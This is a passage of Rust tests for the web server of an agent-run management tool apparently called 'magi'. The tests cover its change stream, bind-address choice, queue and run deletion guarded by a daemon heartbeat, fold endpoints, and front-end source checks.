8656    #[tokio::test]
8657    async fn the_change_stream_announces_the_current_revisions_on_connect() {
8658        let f = Fixture::start().await;
8659
8660        let mut socket = tokio::net::TcpStream::connect(f.addr)
8661            .await
8662            .expect("connect");
8663        socket
8664            .write_all(
8665                b"GET /api/events HTTP/1.1\r\nHost: magi\r\nAccept: text/event-stream\r\n\r\n",
8666            )
8667            .await
8668            .expect("write request");
8669
8670        // Read until the first event arrives rather than to end of stream: the
8671        // stream is endless by design, which is the point of the route.
8672        let mut seen = String::new();
8673        let mut buf = [0u8; 1024];
8674        while !seen.contains("event: change") {
8675            let read = tokio::time::timeout(Duration::from_secs(5), socket.read(&mut buf))
8676                .await
8677                .expect("the stream must speak within five seconds")
8678                .expect("read");
8679            assert!(read > 0, "the server closed the change stream: {seen}");
8680            seen.push_str(&String::from_utf8_lossy(&buf[..read]));
8681        }
8682
8683        assert!(
8684            seen.to_lowercase()
8685                .contains("content-type: text/event-stream"),
8686            "the browser only reconnects automatically for a real SSE stream: {seen}"
8687        );
8688        let data = seen
8689            .lines()
8690            .find_map(|l| l.strip_prefix("data:"))
8691            .expect("a data line");
8692        let payload: Value = serde_json::from_str(data.trim()).expect("json payload");
8693        assert!(
8694            payload["queue_rev"].is_u64()
8695                && payload["runs_rev"].is_u64()
8696                && payload["questions_rev"].is_u64()
8697                && payload["talks_rev"].is_u64()
8698                && payload["notifications_rev"].is_u64()
8699                && payload["loop_rev"].is_u64(),
8700            "the client needs one revision per store to know what to refetch, \
8701             and `talks_rev` is the only notification a standing talk gets - a \
8702             phone whose radio slept through a turn learns about it here, as \
8703             does one whose operator started the loop from another device: \
8704             {payload}"
8705        );
8706
8707        // The front end re-polls health on a timer and on wake, and takes the
8708        // revisions from that answer whenever the stream is not up. So health
8709        // has to carry every key the stream carries: a phone on a link that
8710        // will not hold an SSE connection is exactly the phone that must still
8711        // notice a question, and a missing key there is not a 500 but a UI
8712        // that quietly stops updating.
8713        let health = f.get("/api/health").await.json();
8714        for key in [
8715            "queue_rev",
8716            "runs_rev",
8717            "questions_rev",
8718            "talks_rev",
8719            "notifications_rev",
8720            "loop_rev",
8721        ] {
8722            assert!(
8723                health[key].is_u64(),
8724                "health is the change stream's fallback and is missing `{key}`: {health}"
8725            );
8726        }
8727    }
8728
8729    #[tokio::test]
8730    async fn a_new_turn_on_a_talk_moves_the_change_stream_revision() {
8731        let f = Fixture::start().await;
8732        let before = f.get("/api/health").await.json()["talks_rev"]
8733            .as_u64()
8734            .expect("talks_rev");
8735
8736        let talk = seed_talk(&f, "20260904-014455-ab12", "open");
8737        std::thread::sleep(Duration::from_millis(10));
8738        let mut on_disk = f.talks().get(&talk).expect("get seeded talk");
8739        on_disk.turns.push(crate::talk::Turn {
8740            who: crate::talk::Who::Operator,
8741            body: "a new turn".to_owned(),
8742            at: Timestamp::now(),
8743            attachments: Vec::new(),
8744        });
8745        f.talks().put(&mut on_disk).expect("record a turn");
8746
8747        let after = f.get("/api/health").await.json()["talks_rev"]
8748            .as_u64()
8749            .expect("talks_rev");
8750        assert_ne!(
8751            before, after,
8752            "a phone must be able to notice a talk's reply without polling every store"
8753        );
8754    }
8755
8756    #[test]
8757    fn bind_reads_back_from_the_spelling_the_cli_prints() {
8758        // The CLI shows the default in `--help` and parses whatever comes
8759        // back, so the two directions have to agree or `--bind auto` breaks
8760        // the moment someone copies the help text.
8761        for bind in [Bind::Auto, Bind::Addr(IpAddr::V4(Ipv4Addr::LOCALHOST))] {
8762            assert_eq!(bind.to_string().parse::<Bind>(), Ok(bind));
8763        }
8764        assert_eq!("AUTO".parse::<Bind>(), Ok(Bind::Auto));
8765        assert!("everywhere".parse::<Bind>().is_err());
8766    }
8767
8768    #[test]
8769    fn an_explicit_bind_address_is_taken_verbatim() {
8770        let asked = IpAddr::V4(Ipv4Addr::new(192, 168, 1, 20));
8771
8772        let (addr, warning) = resolve_bind(&Bind::Addr(asked));
8773
8774        assert_eq!(addr, asked);
8775        assert!(
8776            warning.is_none(),
8777            "an operator who named an address gets no lecture"
8778        );
8779    }
8780
8781    #[test]
8782    fn bind_auto_either_finds_a_tailnet_address_or_says_the_ui_is_local_only() {
8783        let (addr, warning) = resolve_bind(&Bind::Auto);
8784
8785        // This has to hold on a CI runner with no `tailscale` and on a dev box
8786        // with one, so the invariant asserted is the one shared by both
8787        // outcomes: the address is either a real tailnet address offered
8788        // without comment, or loopback with an explanation. What must never
8789        // happen is a silent fallback - an operator told "listening on
8790        // 127.0.0.1" with no reason would go looking for a firewall.
8791        match addr {
8792            IpAddr::V4(ip) if is_tailnet(&ip) => {
8793                assert!(warning.is_none(), "a tailnet address needs no warning");
8794            }
8795            other => {
8796                assert_eq!(other, IpAddr::V4(Ipv4Addr::LOCALHOST));
8797                let warning = warning.expect("a fallback has to explain itself");
8798                assert!(
8799                    warning.contains("127.0.0.1") && warning.contains("local-only"),
8800                    "the warning says what happened and what it costs: {warning}"
8801                );
8802            }
8803        }
8804    }
8805
8806    #[test]
8807    fn only_the_cgnat_block_counts_as_a_tailnet_address() {
8808        // `tailscale ip -4` output is trusted only inside 100.64.0.0/10; the
8809        // boundary cases are what stop us binding to some other tool's idea of
8810        // an address.
8811        assert!(is_tailnet(&Ipv4Addr::new(100, 64, 0, 1)));
8812        assert!(is_tailnet(&Ipv4Addr::new(100, 127, 255, 254)));
8813        assert!(!is_tailnet(&Ipv4Addr::new(100, 63, 255, 255)));
8814        assert!(!is_tailnet(&Ipv4Addr::new(100, 128, 0, 1)));
8815        assert!(!is_tailnet(&Ipv4Addr::new(127, 0, 0, 1)));
8816    }
8817
8818    #[test]
8819    fn an_ambiguous_prefix_is_a_bad_request_and_a_missing_one_is_not_found() {
8820        let ids = vec![
8821            "20260902-140501-aaaa".to_owned(),
8822            "20260902-140502-aabb".to_owned(),
8823        ];
8824
8825        let missing = pick(ids.clone(), "zzzz", "run").expect_err("no match");
8826        let ambiguous = pick(ids.clone(), "202609", "run").expect_err("two matches");
8827        let short = pick(ids, "aabb", "run").expect("the short id is the tail of an id");
8828
8829        assert_eq!(missing.status, StatusCode::NOT_FOUND);
8830        assert_eq!(ambiguous.status, StatusCode::BAD_REQUEST);
8831        assert_eq!(short, "20260902-140502-aabb");
8832    }
8833    #[tokio::test]
8834    async fn a_panel_reaches_its_assets_by_the_bare_name_it_was_told_to_use() {
8835        // The prompt tells agents to reference attachments by bare filename.
8836        // A document served at `.../panel` resolves `shot.png` against its own
8837        // directory, i.e. `.../shot.png`, which is not the asset route - so a
8838        // panel written exactly as instructed showed broken images. Caught by
8839        // looking at a real one in a browser, not by reading the code.
8840        let fx = Fixture::start().await;
8841        let id = panel(
8842            &fx,
8843            "<img src=\"shot.png\">",
8844            &[("shot.png", b"\x89PNG\r\n\x1a\n")],
8845        );
8846
8847        // The frame's own URL ends in a filename, so its siblings are reachable.
8848        let doc = fx
8849            .get(&format!("/api/questions/{id}/panel/index.html"))
8850            .await;
8851        assert_eq!(doc.status, 200, "{}", doc.body);
8852        assert_eq!(doc.header("content-type"), Some("text/html; charset=utf-8"));
8853
8854        let sibling = fx.get(&format!("/api/questions/{id}/panel/shot.png")).await;
8855        assert_eq!(sibling.status, 200, "{}", sibling.body);
8856        assert_eq!(sibling.header("content-type"), Some("image/png"));
8857        assert_eq!(
8858            sibling.header("content-security-policy"),
8859            Some(PANEL_CSP),
8860            "the sibling route must carry the same policy as the asset route"
8861        );
8862
8863        // The original spelling keeps working: HEAD on it is how the front end
8864        // decides whether to mount a frame at all.
8865        assert_eq!(
8866            fx.head(&format!("/api/questions/{id}/panel")).await.status,
8867            200
8868        );
8869    }
8870
8871    #[test]
8872    fn runs_revision_moves_when_deleting_an_older_run() {
8873        let temp = TempDir::new().expect("tempdir");
8874        let runs = temp.path().join("runs");
8875        std::fs::create_dir_all(&runs).expect("create runs dir");
8876
8877        assert_eq!(runs_revision(&runs), 0, "empty runs has 0 revision");
8878
8879        write_run(&runs, "20260901-100000-old1", RunStatus::Merged);
8880        std::thread::sleep(Duration::from_millis(10));
8881        write_run(&runs, "20260902-100000-new2", RunStatus::Merged);
8882
8883        let rev_before = runs_revision(&runs);
8884        assert!(rev_before > 0);
8885
8886        let old_dir = runs.join("20260901-100000-old1");
8887        std::fs::remove_dir_all(&old_dir).expect("remove old run");
8888
8889        let rev_after = runs_revision(&runs);
8890        assert_ne!(
8891            rev_before, rev_after,
8892            "deleting an older run must change the revision so other clients see the deletion"
8893        );
8894    }
8895
8896    /// A run's own `run.json` on an explicit `runs` root, bypassing the
8897    /// process-global home entirely — `RunState::save` writes through
8898    /// `run::home()`, whose `set_home` is a `OnceLock` no unit test may touch
8899    /// (see `tests::home_lock` in the integration suite for why).
8900    fn write_state(runs: &FsPath, state: &RunState) {
8901        let dir = runs.join(&state.id);
8902        std::fs::create_dir_all(&dir).expect("run dir");
8903        std::fs::write(
8904            dir.join("run.json"),
8905            serde_json::to_string_pretty(state).expect("serialize run"),
8906        )
8907        .expect("write run.json");
8908    }
8909
8910    /// A seat starting or finishing is a write to `run.json` like any other,
8911    /// so it moves the same revision the change stream already watches —
8912    /// nothing new for `/api/events` to learn, but the property this feature
8913    /// depends on to reach the phone without a poll.
8914    #[test]
8915    fn runs_revision_moves_when_a_seat_starts_and_again_when_it_finishes() {
8916        let temp = TempDir::new().expect("tempdir");
8917        let runs = temp.path().join("runs");
8918        std::fs::create_dir_all(&runs).expect("create runs dir");
8919        let mut state = RunState::new(
8920            PathBuf::from("/repo/magi"),
8921            "main".to_owned(),
8922            "0123456789abcdef".to_owned(),
8923            "task".to_owned(),
8924            Config::default(),
8925        );
8926        state.id = "20260902-100000-c0de".to_owned();
8927        write_state(&runs, &state);
8928
8929        let rev_idle = runs_revision(&runs);
8930        std::thread::sleep(Duration::from_millis(10));
8931        state.seat_started("judge", "judge-1", std::time::Duration::from_secs(60), 0);
8932        write_state(&runs, &state);
8933        let rev_started = runs_revision(&runs);
8934        assert_ne!(
8935            rev_idle, rev_started,
8936            "a seat starting must move the revision"
8937        );
8938
8939        std::thread::sleep(Duration::from_millis(10));
8940        state.seat_finished("judge-1");
8941        write_state(&runs, &state);
8942        let rev_finished = runs_revision(&runs);
8943        assert_ne!(
8944            rev_started, rev_finished,
8945            "and clearing it again must move the revision a second time"
8946        );
8947    }
8948
8949    #[tokio::test]
8950    async fn queue_json_carries_dependency_fields_and_a_hold_clears_them() {
8951        // `TaskView` flattens `Task`, so this is really asserting that
8952        // `#[serde(flatten)]` at web.rs:2530 hasn't quietly dropped a field -
8953        // e11fc58 added `blocked_by`/`block_reason`/`answers` to `Task` but
8954        // never touched web.rs, so nothing here caught it if it had.
8955        let fx = Fixture::start().await;
8956        let q = fx.queue();
8957
8958        let mut t = Task::new(
8959            "Task".to_owned(),
8960            "Instruction".to_owned(),
8961            PathBuf::from("/repo"),
8962            Source::Human,
8963        );
8964        t.block(
8965            vec!["20260101-000000-dead".to_owned()],
8966            Some("waiting on Task 1".to_owned()),
8967        );
8968        t.answers.push(crate::queue::AnsweredQuestion {
8969            question: "Which backend?".to_owned(),
8970            answer: "SQLite".to_owned(),
8971        });
8972        q.put(&mut t).expect("put t");
8973
8974        let res = fx.get("/api/queue").await;
8975        assert_eq!(res.status, 200);
8976        let list = res.json();
8977        let view = list
8978            .as_array()
8979            .expect("array")
8980            .iter()
8981            .find(|v| v["id"] == t.id)
8982            .expect("task in list");
8983        assert_eq!(view["status_str"], "blocked");
8984        assert_eq!(
8985            view["blocked_by"],
8986            serde_json::json!(["20260101-000000-dead"])
8987        );
8988        assert_eq!(view["block_reason"], "waiting on Task 1");
8989        assert_eq!(view["answers"][0]["question"], "Which backend?");
8990        assert_eq!(view["answers"][0]["answer"], "SQLite");
8991
8992        // A manual hold clears `blocked_by`/`block_reason` (`Task::hold_manual`)
8993        // but never `answers` - that is a settled decision, not state
8994        // describing the current block, so it survives.
8995        let res = fx
8996            .post(&format!("/api/queue/{}/hold", t.short()), None)
8997            .await;
8998        assert_eq!(res.status, 200);
8999        let held = res.json();
9000        assert_eq!(held["status_str"], "held");
9001        assert_eq!(held["blocked_by"], serde_json::json!([]));
9002        assert!(held["block_reason"].is_null());
9003        assert_eq!(held["answers"][0]["answer"], "SQLite");
9004    }
9005
9006    #[tokio::test]
9007    async fn queue_json_shows_a_blocked_chain_and_its_stuck_root() {
9008        let fx = Fixture::start().await;
9009        let q = fx.queue();
9010        let mk = |title: &str| {
9011            Task::new(
9012                title.to_owned(),
9013                "Instruction".to_owned(),
9014                PathBuf::from("/repo"),
9015                Source::Human,
9016            )
9017        };
9018        let mut root = mk("root");
9019        root.hold_manual(Some("waiting".to_owned()));
9020        q.put(&mut root).unwrap();
9021        let mut mid = mk("mid");
9022        mid.block(vec![root.id.clone()], None);
9023        q.put(&mut mid).unwrap();
9024        let mut leaf = mk("leaf");
9025        leaf.block(vec![mid.id.clone()], None);
9026        q.put(&mut leaf).unwrap();
9027
9028        let list = fx.get("/api/queue").await.json();
9029        let find = |id: &str| {
9030            list.as_array()
9031                .unwrap()
9032                .iter()
9033                .find(|v| v["id"] == id)
9034                .unwrap()
9035                .clone()
9036        };
9037        let leaf_view = find(&leaf.id);
9038        assert_eq!(
9039            leaf_view["waits_on"],
9040            serde_json::json!([format!("{} (blocked → {} held)", mid.short(), root.short())])
9041        );
9042        assert_eq!(leaf_view["stuck_roots"], serde_json::json!([root.short()]));
9043        assert_eq!(
9044            find(&mid.id)["waits_on"],
9045            serde_json::json!([format!("{} (held)", root.short())])
9046        );
9047        assert_eq!(find(&root.id)["waits_on"], serde_json::json!([]));
9048    }
9049
9050    #[tokio::test]
9051    async fn delete_queue_task_deletes_file_and_guards_running_and_locked() {
9052        let fx = Fixture::start().await;
9053        let q = fx.queue();
9054
9055        // 1. A queued task with runs attached can be deleted.
9056        let mut t1 = Task::new(
9057            "Task 1".to_owned(),
9058            "Instruction 1".to_owned(),
9059            PathBuf::from("/repo"),
9060            Source::Human,
9061        );
9062        let run_id = "20260901-000000-r111";
9063        t1.runs.push(run_id.to_owned());
9064        write_run(&fx.runs(), run_id, RunStatus::Merged);
9065        q.put(&mut t1).expect("put t1");
9066
9067        // Delete by short id
9068        let res = fx.delete(&format!("/api/queue/{}", t1.short())).await;
9069        assert_eq!(res.status, 204);
9070        assert!(res.body.is_empty(), "204 No Content has no body");
9071        assert!(!q.path_of(&t1.id).exists(), "task file is deleted");
9072        assert!(
9073            fx.runs().join(run_id).exists(),
9074            "run directory must not be deleted when its task is deleted"
9075        );
9076
9077        // 2. A task a live daemon is running is refused with 409.
9078        let mut t2 = Task::new(
9079            "Task 2".to_owned(),
9080            "Instruction 2".to_owned(),
9081            PathBuf::from("/repo"),
9082            Source::Human,
9083        );
9084        t2.status = TaskStatus::Running;
9085        q.put(&mut t2).expect("put t2");
9086        let mut beat = crate::daemon::Status::new();
9087        beat.current = vec![crate::daemon::Current {
9088            task: t2.id.clone(),
9089            run: "20260901-000000-r222".to_owned(),
9090        }];
9091        beat.updated_at = jiff::Timestamp::now();
9092        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9093            .expect("publish a heartbeat");
9094        let res = fx.delete(&format!("/api/queue/{}", t2.id)).await;
9095        assert_eq!(res.status, 409);
9096        assert!(
9097            res.json()["error"]
9098                .as_str()
9099                .unwrap()
9100                .contains("live daemon")
9101        );
9102        assert!(q.path_of(&t2.id).exists(), "a task in flight is kept");
9103
9104        // 3. The same `running` status and an orphaned lock, with no daemon
9105        // behind either, is a leftover and deletable. Before this the phone
9106        // refused it for good: the status never changes on its own and
9107        // nothing drops a lock whose process is gone.
9108        // The daemon is killed: the file stays, the heartbeat stops.
9109        beat.updated_at = jiff::Timestamp::now() - jiff::SignedDuration::from_secs(600);
9110        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9111            .expect("leave a stale heartbeat");
9112        let mut t3 = Task::new(
9113            "Task 3".to_owned(),
9114            "Instruction 3".to_owned(),
9115            PathBuf::from("/repo"),
9116            Source::Human,
9117        );
9118        t3.status = TaskStatus::Running;
9119        q.put(&mut t3).expect("put t3");
9120        std::mem::forget(q.claim(&t3.id).expect("claim t3"));
9121        let res = fx.delete(&format!("/api/queue/{}", t3.id)).await;
9122        assert_eq!(res.status, 204);
9123        assert!(!q.path_of(&t3.id).exists(), "the task file is gone");
9124        assert!(
9125            q.claim(&t3.id).is_ok(),
9126            "the stale lock went with it, so the id is claimable again"
9127        );
9128
9129        // 4. Missing id returns 404
9130        let res = fx.delete("/api/queue/nonexistent").await;
9131        assert_eq!(res.status, 404);
9132    }
9133
9134    #[tokio::test]
9135    async fn delete_run_deletes_directory_and_guards_running_and_unfolded() {
9136        let fx = Fixture::start().await;
9137        let runs = fx.runs();
9138
9139        // 1. Finished and folded run can be deleted along with artifacts
9140        let run_id = "20260901-000000-fold";
9141        let mut state = RunState::new(
9142            PathBuf::from("/repo"),
9143            "main".to_owned(),
9144            "abc".to_owned(),
9145            "instruction".to_owned(),
9146            Config::default(),
9147        );
9148        state.id = run_id.to_owned();
9149        state.status = RunStatus::Merged;
9150        state.candidates.push(crate::run::Candidate {
9151            index: 0,
9152            label: 'A',
9153            agent: "a".to_owned(),
9154            branch: "b".to_owned(),
9155            worktree: PathBuf::from("/w"),
9156            summary: String::new(),
9157            stat: String::new(),
9158            files: 1,
9159            commits: 1,
9160            empty: false,
9161            failed: None,
9162            verified_noop: None,
9163            duration_ms: 0,
9164            folded: true,
9165        });
9166        let dir = runs.join(run_id);
9167        std::fs::create_dir_all(dir.join("artifacts")).expect("create artifacts");
9168        std::fs::write(dir.join("artifacts").join("patch.diff"), "dummy diff")
9169            .expect("write artifact");
9170        std::fs::write(dir.join("run.json"), serde_json::to_string(&state).unwrap())
9171            .expect("write run.json");
9172
9173        // Delete by short id
9174        let res = fx.delete(&format!("/api/runs/{}", state.short())).await;
9175        assert_eq!(res.status, 204);
9176        assert!(res.body.is_empty(), "204 has no body");
9177        assert!(!dir.exists(), "run directory and artifacts must be deleted");
9178
9179        // 2. A run a live daemon is working on is refused with 409. The
9180        // heartbeat is what makes it refusable: an unfinished run with no
9181        // daemon behind it is a leftover from a killed process, and case 1
9182        // above would otherwise be impossible to tell apart from this one.
9183        let run_running = "20260901-000000-rung";
9184        write_run(&runs, run_running, RunStatus::Prep);
9185        let mut beat = crate::daemon::Status::new();
9186        beat.current = vec![crate::daemon::Current {
9187            task: "20260901-000000-task".to_owned(),
9188            run: run_running.to_owned(),
9189        }];
9190        beat.updated_at = jiff::Timestamp::now();
9191        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9192            .expect("publish a heartbeat");
9193        let res = fx.delete(&format!("/api/runs/{run_running}")).await;
9194        assert_eq!(res.status, 409);
9195        assert!(
9196            res.json()["error"]
9197                .as_str()
9198                .unwrap()
9199                .contains("live daemon"),
9200            "the refusal must say who is holding it"
9201        );
9202        assert!(
9203            runs.join(run_running).exists(),
9204            "a run in flight keeps its directory"
9205        );
9206
9207        // 3. Finished run with unfolded candidate is refused with 409 and mentions `magi fold`
9208        let run_unfolded = "20260901-000000-unfd";
9209        let mut state2 = RunState::new(
9210            PathBuf::from("/repo"),
9211            "main".to_owned(),
9212            "abc".to_owned(),
9213            "instruction".to_owned(),
9214            Config::default(),
9215        );
9216        state2.id = run_unfolded.to_owned();
9217        state2.status = RunStatus::Ready;
9218        state2.candidates.push(crate::run::Candidate {
9219            index: 0,
9220            label: 'A',
9221            agent: "a".to_owned(),
9222            branch: "b".to_owned(),
9223            worktree: PathBuf::from("/w"),
9224            summary: String::new(),
9225            stat: String::new(),
9226            files: 1,
9227            commits: 1,
9228            empty: false,
9229            failed: None,
9230            verified_noop: None,
9231            duration_ms: 0,
9232            folded: false,
9233        });
9234        let dir2 = runs.join(run_unfolded);
9235        std::fs::create_dir_all(&dir2).expect("create dir2");
9236        std::fs::write(
9237            dir2.join("run.json"),
9238            serde_json::to_string(&state2).unwrap(),
9239        )
9240        .expect("write run.json");
9241
9242        let res = fx.delete(&format!("/api/runs/{run_unfolded}")).await;
9243        assert_eq!(res.status, 409);
9244        assert!(res.json()["error"].as_str().unwrap().contains("magi fold"));
9245        assert!(dir2.exists(), "unfolded run directory is kept");
9246
9247        // 4. Missing id returns 404
9248        let res = fx.delete("/api/runs/nonexistent").await;
9249        assert_eq!(res.status, 404);
9250    }
9251
9252    /// The queue tiles on the Stats tab must render even on a home with no
9253    /// runs at all: queue state is not derived from run history, so hiding
9254    /// the whole dashboard body behind "no runs yet" would drop the one
9255    /// thing this tab promises unconditionally (queued/running/held/done).
9256    /// A DOM-level test would need a browser this suite does not have, so
9257    /// this pins the same invariant textually: `renderStatsQueue` is called
9258    /// once in `renderStats`, and that call sits outside the `if (!noRuns)`
9259    /// block that gates the run-derived panels.
9260    #[test]
9261    fn stats_queue_tiles_render_even_when_there_are_no_runs() {
9262        let start = APP_JS
9263            .find("function renderStats() {")
9264            .expect("renderStats");
9265        let end = start
9266            + APP_JS[start..]
9267                .find("function statsTile(")
9268                .expect("the next top-level function");
9269        let body = &APP_JS[start..end];
9270
9271        let gate_start = body.find("if (!noRuns) {").expect("the noRuns gate");
9272        let gate_end = gate_start
9273            + body[gate_start..]
9274                .find("}\n  renderStatsQueue")
9275                .expect("the gate's own closing brace, right before the unconditional call");
9276        let gated = &body[gate_start..gate_end];
9277
9278        assert_eq!(
9279            body.matches("renderStatsQueue(").count(),
9280            1,
9281            "renderStats must call renderStatsQueue exactly once: {body}"
9282        );
9283        assert!(
9284            !gated.contains("renderStatsQueue"),
9285            "renderStatsQueue must not be inside the `if (!noRuns)` block that hides the \
9286             run-derived panels on an empty run history - the queue panel has to render \
9287             regardless: {gated}"
9288        );
9289    }
9290
9291    #[test]
9292    fn web_ui_delete_contract_in_front_end() {
9293        // 1. API block has both delete endpoints
9294        assert!(APP_JS.contains("deleteRun:"));
9295        assert!(APP_JS.contains("deleteTask:"));
9296
9297        // 2. #runs-list card builder (createRunCard / updateRunCard) has no delete entry
9298        let run_cards_slice = &APP_JS[APP_JS.find("function createRunCard").unwrap()
9299            ..APP_JS.find("function renderRuns").unwrap()];
9300        assert!(!run_cards_slice.to_lowercase().contains("delete"));
9301
9302        // 3. Run detail has delete entry and reasons
9303        assert!(APP_JS.contains("renderRunDelete"));
9304        assert!(APP_JS.contains("runDeleteReason"));
9305        assert!(APP_JS.contains("magi fold"));
9306        assert!(APP_JS.contains("This run is still in flight and cannot be deleted."));
9307
9308        // 4. Two-step delete arming and focus on Cancel
9309        assert!(APP_JS.contains("cancel.focus"));
9310        assert!(APP_JS.contains("armedRunDelete"));
9311        assert!(APP_JS.contains("armedDelete"));
9312
9313        // 5. Running task has disabled delete
9314        assert!(APP_JS.contains("disabled: status === \"running\""));
9315    }
9316
9317    /// Every element a run card's updater reaches for must be in the `refs`
9318    /// the builder handed it.
9319    ///
9320    /// `createRunCard` builds its elements, appends them to the card, and then
9321    /// lists them again in `row.refs`. That second list is the one the updater
9322    /// uses, and nothing connects the two - an element can be built, appended
9323    /// and rendered, and still be missing from `refs`. `superseded` was, for
9324    /// two releases: `setText(r.superseded, ...)` threw on the first card, the
9325    /// exception took `syncList` with it, and the deck showed
9326    /// "13 runs, 2 in flight, 8 unreadable" above an empty list. The count
9327    /// line is computed before the cards, which is why the failure looked like
9328    /// a server that had lost its runs rather than a front end that had
9329    /// stopped rendering them.
9330    ///
9331    /// A `cargo test` cannot execute the front end, so this reads the two
9332    /// halves out of the source and compares them as sets. It is not a check
9333    /// on the wording of either list: adding an element, renaming one, or
9334    /// reordering them all keeps this passing, and only using one the builder
9335    /// never published fails it.
9336    #[test]
9337    fn every_ref_a_run_card_uses_is_one_its_builder_published() {
9338        let build = APP_JS
9339            .find("function createRunCard")
9340            .expect("createRunCard exists");
9341        let update = APP_JS
9342            .find("function updateRunCard")
9343            .expect("updateRunCard exists");
9344        let end = APP_JS
9345            .find("function renderRuns")
9346            .expect("renderRuns exists");
9347
9348        // The builder's published set: the object literal assigned to `refs`.
9349        let builder = &APP_JS[build..update];
9350        let open = builder.find("refs = {").expect("createRunCard sets refs");
9351        let literal = &builder[open + "refs = {".len()..];
9352        let close = literal.find('}').expect("the refs literal is closed");
9353        let published: HashSet<&str> = literal[..close]
9354            .split(',')
9355            // `name` and `name: value` both bind `name`.
9356            .filter_map(|entry| entry.split(':').next())
9357            .map(str::trim)
9358            .filter(|name| !name.is_empty())
9359            .collect();
9360        assert!(
9361            published.len() > 5,
9362            "the refs literal did not parse into names: {published:?}"
9363        );
9364
9365        // What the updaters reach for: every `r.<name>`, where `r` is the
9366        // `const r = row.refs` alias both functions open with.
9367        let mut used: Vec<&str> = Vec::new();
9368        let updaters = &APP_JS[update..end];
9369        for (at, _) in updaters.match_indices("r.") {
9370            // `r` must be the whole identifier, not the tail of another one
9371            // (`Number.parseFloat`, `pr.url`, `for.` and friends).
9372            let before = updaters[..at].chars().next_back();
9373            if before.is_some_and(|c| c.is_alphanumeric() || c == '_' || c == '$' || c == '.') {
9374                continue;
9375            }
9376            let rest = &updaters[at + 2..];
9377            let len = rest
9378                .find(|c: char| !(c.is_alphanumeric() || c == '_' || c == '$'))
9379                .unwrap_or(rest.len());
9380            if len > 0 {
9381                used.push(&rest[..len]);
9382            }
9383        }
9384        assert!(
9385            used.len() > 5,
9386            "no `r.<name>` uses were found; the updaters must have been rewritten: {used:?}"
9387        );
9388
9389        let missing: Vec<&str> = used
9390            .iter()
9391            .copied()
9392            .filter(|name| !published.contains(name))
9393            .collect();
9394        assert!(
9395            missing.is_empty(),
9396            "a run card's updater reaches for {missing:?}, which `createRunCard` \
9397             never put in `refs` - every card will throw and the list will \
9398             render empty under a count line that says otherwise. Published: \
9399             {published:?}"
9400        );
9401    }
9402
9403    #[tokio::test]
9404    async fn folding_from_the_phone_reports_what_it_removed() {
9405        let fx = Fixture::start().await;
9406        let runs = fx.runs();
9407
9408        // A run with no candidates has nothing to fold, which is a 200 with an
9409        // honest count rather than an error: the operator asked for the trees
9410        // to be gone and they are.
9411        let id = "20260901-000000-fold";
9412        write_run(&runs, id, RunStatus::Stalled);
9413        let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
9414        assert_eq!(res.status, 200);
9415        assert_eq!(res.json()["removed_count"], 0);
9416        assert_eq!(res.json()["run"], id);
9417        assert!(
9418            runs.join(id).exists(),
9419            "a fold keeps the run's record; only the worktrees go"
9420        );
9421    }
9422
9423    #[tokio::test]
9424    async fn folding_an_unreadable_run_falls_back_to_removing_it_wholesale() {
9425        let fx = Fixture::start().await;
9426        let runs = fx.runs();
9427        let wt = fx.home.path().join("wt").join("magi").join("dead");
9428        let id = "20260901-000000-dead";
9429        std::fs::create_dir_all(runs.join(id)).expect("run dir");
9430        std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
9431        std::fs::create_dir_all(&wt).expect("worktree dir");
9432
9433        let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
9434        assert_eq!(res.status, 200, "{}", res.body);
9435        assert!(
9436            res.json()["removed_count"].as_u64().unwrap() > 0,
9437            "the worktree this build could not read a state for still went"
9438        );
9439        assert!(
9440            !runs.join(id).exists(),
9441            "an unreadable run has no candidate list to fold selectively, so \
9442             the whole record goes - same as `magi fold` on the CLI"
9443        );
9444    }
9445
9446    #[tokio::test]
9447    async fn deleting_an_unreadable_run_removes_it_wholesale() {
9448        let fx = Fixture::start().await;
9449        let runs = fx.runs();
9450        let wt = fx.home.path().join("wt").join("magi").join("gone");
9451        let id = "20260901-000000-gone";
9452        std::fs::create_dir_all(runs.join(id)).expect("run dir");
9453        std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
9454        std::fs::create_dir_all(&wt).expect("worktree dir");
9455
9456        let res = fx.delete(&format!("/api/runs/{id}")).await;
9457        assert_eq!(res.status, 204, "{}", res.body);
9458        assert!(!runs.join(id).exists(), "the broken record is gone");
9459        assert!(!wt.exists(), "its worktree is gone too");
9460    }
9461
9462    #[tokio::test]
9463    async fn folding_is_refused_while_a_daemon_is_working_on_the_run() {
9464        let fx = Fixture::start().await;
9465        let runs = fx.runs();
9466        let id = "20260901-000000-live";
9467        write_run(&runs, id, RunStatus::Implementing);
9468
9469        let mut beat = crate::daemon::Status::new();
9470        beat.current = vec![crate::daemon::Current {
9471            task: "20260901-000000-task".to_owned(),
9472            run: id.to_owned(),
9473        }];
9474        beat.updated_at = jiff::Timestamp::now();
9475        crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
9476            .expect("publish a heartbeat");
9477
9478        let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
9479        assert_eq!(res.status, 409);
9480        assert!(
9481            res.json()["error"]
9482                .as_str()
9483                .unwrap()
9484                .contains("live daemon"),
9485            "folding under a running agent would pull its worktree away"
9486        );
9487    }
9488
9489    #[tokio::test]
9490    async fn fold_merged_requires_a_pr_url() {
9491        let fx = Fixture::start().await;
9492        let runs = fx.runs();
9493        let id = "20260901-000000-nourl";
9494        write_run(&runs, id, RunStatus::Blocked);
9495
9496        let res = fx
9497            .post(&format!("/api/runs/{id}/fold-merged"), Some("{}"))
9498            .await;
9499        assert_eq!(res.status, 400, "{}", res.body);
9500
9501        let blank = fx
9502            .post(
9503                &format!("/api/runs/{id}/fold-merged"),
9504                Some(r#"{"pr_url":"   "}"#),
9505            )
9506            .await;
9507        assert_eq!(blank.status, 400, "{}", blank.body);
9508    }
9509
9510    #[tokio::test]
9511    async fn fold_merged_is_404_for_an_unknown_run() {
9512        let fx = Fixture::start().await;
9513        let res = fx
9514            .post(
9515                "/api/runs/nosuchrun/fold-merged",
9516                Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
9517            )
9518            .await;
